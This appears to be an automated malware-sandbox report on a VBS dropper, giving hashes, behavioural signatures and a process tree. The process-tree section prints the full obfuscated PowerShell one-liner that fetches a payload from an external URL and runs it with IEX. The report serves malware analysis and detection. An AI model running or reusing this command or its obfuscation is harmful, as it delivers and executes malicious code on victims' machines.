Analysis
-
max time kernel
13s -
max time network
13s -
platform
windows7_x64 -
resource
win7v20210408 -
submitted
04-05-2021 06:04
Static task
static1
Behavioral task
behavioral1
Sample
GK58.vbs
Resource
win7v20210408
windows7_x64
0 signatures
0 seconds
General
-
Target
GK58.vbs
-
Size
436B
-
MD5
a3f4ec37e400752adb85a34e63560be8
-
SHA1
b20367d00c0bd8ed3f9df0838c237267b7694a84
-
SHA256
32696fdc1973162602638cdec277dde152bf855ee4be61a47258fd7b09354b65
-
SHA512
93f0b8cb8d08d03510f5a4ccf7470bf3620df2da8f7e77cc4790cefbae461ee9ff5fb3b4961adf40061264e1032e09165078d433f3d4805f9a9f419f8ea8b1a1
Score
10/10
Malware Config
Extracted
Language
ps1
Deobfuscated
URLs
exe.dropper
https://teammagical.com/3.txt
Signatures
-
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 7 1752 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exepid process 1752 powershell.exe 1752 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 1752 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
Processes:
WScript.exedescription pid process target process PID 1640 wrote to memory of 1752 1640 WScript.exe powershell.exe PID 1640 wrote to memory of 1752 1640 WScript.exe powershell.exe PID 1640 wrote to memory of 1752 1640 WScript.exe powershell.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\GK58.vbs"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $A='DowRing'.Replace('R','nloadstr');$B = 'WebCAMt'.Replace('AM','lien');$d='tnt'.Replace('tn','Ne');$link ='https://teammagical.com/3.txt';$t1='(New-OS'.Replace('S','bje');$t2='ct Sypek)'.Replace('pe','stem.$d.$B).$A($lin');$WC=I`E`X ($t1,$t2 -Join '')|I`E`X2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/1640-60-0x000007FEFC0C1000-0x000007FEFC0C3000-memory.dmpFilesize
8KB
-
memory/1752-61-0x0000000000000000-mapping.dmp
-
memory/1752-63-0x00000000022E0000-0x00000000022E1000-memory.dmpFilesize
4KB
-
memory/1752-64-0x000000001AB90000-0x000000001AB91000-memory.dmpFilesize
4KB
-
memory/1752-65-0x00000000026F0000-0x00000000026F1000-memory.dmpFilesize
4KB
-
memory/1752-66-0x00000000023B0000-0x00000000023B1000-memory.dmpFilesize
4KB
-
memory/1752-67-0x000000001AA10000-0x000000001AA12000-memory.dmpFilesize
8KB
-
memory/1752-68-0x000000001AA14000-0x000000001AA16000-memory.dmpFilesize
8KB
-
memory/1752-69-0x000000001B6A0000-0x000000001B6A1000-memory.dmpFilesize
4KB